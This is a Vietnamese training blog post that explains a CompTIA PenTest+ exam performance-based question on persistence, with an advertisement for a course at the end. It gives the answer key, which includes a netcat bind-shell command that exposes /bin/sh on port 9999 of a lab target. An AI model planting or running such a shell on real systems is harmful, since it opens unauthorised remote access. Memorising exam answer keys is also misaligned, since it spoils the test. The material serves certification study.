Trong bài thi CompTIA PenTest+ (PT0-003), các câu hỏi Performance-Based Questions (PBQ) đòi hỏi bạn không chỉ nắm vững lý thuyết mà còn phải có tư duy thực chiến để xử lý các tình huống giả định. Dưới đây là phần bóc tách chi tiết cho kịch bản Maintain Persistence (Duy trì quyền truy cập).
1. Phân Tích Bối Cảnh (Scenario)
Một tổ chức tài chính đã thuê bạn kiểm thử mạng lưới để đánh giá các chính sách và thiết lập bảo mật. Mục tiêu của bạn là tạo một backdoor (cửa hậu) vào một trong các máy chủ tài chính (Financial Server) và vẽ lại sơ đồ đường dẫn giao tiếp.
Dữ liệu đầu vào đã cho:
- IP máy trạm của PenTester (Attacker): 192.168.100.122
- Danh sách IP Financial server (Target): 192.168.100.144, 10.100.101.55, 10.200.102.50
- Cổng kiểm thử (Port Channel): 9999
- Điều kiện cốt lõi: Chọn mục tiêu dễ dàng nhất (easiest target) trong danh sách để bắt đầu.
2. Giải Pháp Xử Lý Chi Tiết (Solution)
Dựa vào các thông số trên, đây là đáp án chính xác cho từng trường dữ liệu trong bài lab:
A. Cấu hình Terminal (Dòng lệnh)
- Terminal 1 (Root@target – Máy chủ mục tiêu):
nc -lvp9999-e /bin/shlistening on [any]9999...
- Terminal 2 (Root@attacker – Máy trạm tấn công):
nc192.168.100.1449999Connect to [192.168.100.144] from (UNKNOWN) [192.168.100.122]
B. Câu hỏi trắc nghiệm (Questions)
- What tool is this test using? (Công cụ nào đang được sử dụng?): Netcat
- What type of persistent attack are you testing? (Loại tấn công duy trì nào đang được kiểm thử?): Bind Shell
C. Sơ đồ các bên liên quan (Stakeholder Diagram)
- Node #1:
- Device: PenTester Workstation
- IP Address: 192.168.100.122
- Node #2:
- Device: Financial Server
- IP Address: 192.168.100.144
- Listener Port: 9999
3. Giải Thích Chuyên Sâu (Reasoning)
Để thực sự làm chủ kiến thức, chúng ta cần hiểu rõ tại sao lại điền các thông số như vậy:
- Tại sao chọn IP Target là 192.168.100.144?Đề bài yêu cầu chọn mục tiêu “dễ dàng nhất”. Máy trạm của bạn có IP
192.168.100.122. Trong số các IP máy chủ tài chính, IP192.168.100.144nằm cùng subnet (mạng con) với bạn. Tấn công các thiết bị trong cùng mạng nội bộ luôn dễ dàng hơn vì không phải đi qua các lớp định tuyến (routing) phức tạp hay bị Firewall ngăn chặn từ bên ngoài. - Tại sao đây là Bind Shell (mà không phải Reverse Shell)?
- Bind Shell: Máy mục tiêu (Target) mở một cổng (listening port) và đính kèm (bind) một shell (như
/bin/shhoặccmd.exe) vào cổng đó. Kẻ tấn công chủ động kết nối đến cổng đang mở này. (Đúng với tình huống: Target chạync -lvp...và Attacker chạync [IP Target]). - Reverse Shell: Ngược lại, máy mục tiêu sẽ là bên chủ động gọi kết nối (reverse) về máy của kẻ tấn công đang mở cổng chờ sẵn.
- Bind Shell: Máy mục tiêu (Target) mở một cổng (listening port) và đính kèm (bind) một shell (như
- Nhận diện Netcat:Câu lệnh
nclà viết tắt của Netcat, một công cụ kinh điển được mệnh danh là “Swiss Army knife” (dao Thụy Sĩ) của giới mạng và bảo mật, thường dùng để đọc/ghi dữ liệu qua kết nối mạng sử dụng giao thức TCP/UDP.
Nâng Tầm Kỹ Năng Penetration Testing Cùng Security365
Bạn muốn chinh phục hoàn toàn các dạng bài PBQ hóc búa và xây dựng tư duy thực chiến sắc bén? Hãy tham gia ngay Khóa Học CompTIA PENTEST+ tại Security365.
👉 Đăng ký và tìm hiểu chi tiết tại: https://security365.vn/comptia-pentest/
Security365 – Đối tác đào tạo ủy quyền uy tín
- Email: contact@security365.vn
- Zalo Hotline: 0914433338
- Địa chỉ: 118 Hùng Vương, Buôn Ma Thuột
